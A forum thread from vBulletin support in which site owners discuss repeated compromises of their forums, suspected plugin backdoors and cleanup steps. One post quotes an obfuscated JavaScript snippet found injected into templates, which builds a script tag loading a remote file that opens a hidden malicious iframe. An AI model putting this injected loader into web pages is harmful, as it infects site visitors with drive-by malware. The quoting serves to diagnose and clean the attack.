A fix if your site is already exploited

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Joey805
    Senior Member
    • Jan 2004
    • 183

    #31
    I got hit with the same bug too, cleaned it and now its back again 1 day later. I re-uploaded all my vbulletin files, changed every password possible, make sure any plugins I am running are up to date and they STILL got in.

    How the heck can we stop this from happening again? I'm about ready to start looking at other forum software.

    Comment

    • Zachery
      Former vBulletin Support
      • Jul 2002
      • 59097

      #32
      Third party addons? You cleaned the damage, but did you find the source? If you move to another software and the backdoor is still in place it wont matter.

      Your addons being up-2-date help, but its not 100% if the problem is resolved. The addons you're running might still have issues, if the developer hasn't fixed them, or worse doesn't know about them.

      Comment

      • J3rico
        New Member
        • Nov 2006
        • 6
        • 4.1.x

        #33
        Hi, same problem for me, vBulletin 4.1.11, but the problems started with the 4.1.10. vBSEO has been updated with the patch released in January. I removed almost all the plugins/products (all products were updated to their latest version), deleted suspect file diagnostics, replaced any files not containing the expected contents, changed every password possible.
        In my case iframe are inserted in this files : init.php, content.php, vbulletin-core.js (this only with the 4.1.11 version).
        I put lots of rules in the file .htaccess, for 10 days there were no attacks, but since last friday have resumed.
        I know that's not fair to list the installed products, however, a cross-check can be of help.
        Sorry for my bad english.

        Comment

        • Mr Jolly
          Member
          • Feb 2008
          • 93
          • 3.6.x

          #34
          OK my host tell me that they removed a file called vbseo.php which they said was encoded with php but didn't have anything to do with vBSEO. Personally, I guessed that was a story to justify the $200 they charged me after I told them I'd managed to fix everything. But it might be relevant.

          I haven't seen this file or its contents.

          Comment

          • cfages
            New Member
            • Apr 2005
            • 7
            • 3.0.7

            #35
            Originally posted by Mitchh
            Code:
            var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
            If you decode the numbers from the second fromCharCode() you get the following URL:



            This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus softwares like Avast complain about

            Did get the same problem... secret iframe that finally leads to http://directmarketingmanage.in/in.cgi?walter ... many antivirus of my visitors complained about it..

            via phpmyadmin I have found this code in 5 of my template... I have also found a strange "new" file in the root of the forum (verify_ojdojdosjdsj.php file) with some strange code in it (admins, if you want this file I can send it to you)

            I am under vBulletin 4.0.8 Patch Level 2 (vpublishing suite) So I will upgrade to the last version of vbulletin...

            For info I have 2 active plugins :
            - VBSEO (last version 3.6)
            - auto linker 1.1

            Blogs and CMS part of the publishing suite are disabled


            Any idea of how they came into the system? Any patch to prevent this in the future ?


            Regards
            chris

            Comment

            • Jaxo
              Member
              • Dec 2011
              • 36

              #36
              just out of interest,.. how many people having this problem are with godaddy?

              Comment

              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
              Working...